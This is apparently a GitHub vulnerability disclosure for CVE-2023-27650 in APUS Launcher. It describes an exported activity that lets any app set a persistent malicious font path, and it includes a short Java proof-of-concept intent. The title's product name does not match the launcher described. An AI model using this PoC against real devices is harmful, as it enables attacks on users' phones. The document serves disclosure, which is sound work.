Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Code execution exists in Super Secuirty(CVE-2023-27650)

Vendor:APUS Group(https://www.apusapps.com/en/launcher)

Affected product:APUS Launcher(com.apusapps.launcher)

Version:3.10.88, 3.10.73

Download link: https://play.google.com/store/apps/details?id=com.apusapps.launcher

Description of the vulnerability for use in the CVE:An issue found in APUS Group Launcher v.3.10.73 and v.3.10.88 allows a remote attacker to execute arbitrary code via the FONT_FILE parameter.

Additional information:APUS Launcher allows unauthorized applications to launch its Activity and control the font files loaded on the APP desktop by adding additional information. Specifically, APUS Launcher has an open Activity that receives the path to the font file carried in the intent and then loads the APP desktop icon font based on that path, and by specifying the font file path the attacker is able to make APUS Launcher load the malicious font file. It is worth noting that the above attack is persistent, because the path will be stored in the SharedPreference file by APUS Launcher.

APUS Launcher's HiFontCooperationActivity receives the "com.apus.launcher.extra.FONT_FILE" field information carried in the intent and uses this value as the file path to load the APP desktop icon font file path. However, HiFontCooperationActivity is exposed, the attacker can cause APUS Launcher to load malicious fonts by sending an intent carrying malicious file path information, resulting in display exceptions or security vulnerabilities (such as data leakage, application crashes, denial of service attacks, etc.).

poc:

private void attack() {
        Intent intent = new Intent();
        ComponentName componentName = new ComponentName("com.apusapps.launcher", "com.apusapps.launcher.launcher.HiFontCooperationActivity");
        intent.setComponent(componentName);
        intent.putExtra("com.apus.launcher.extra.FONT_FILE", "/data/local/tmp/方正胖头鱼.TTF");
        try {
            System.out.println("start activity");
            startActivity(intent);
        } catch (Exception e) {
        }
}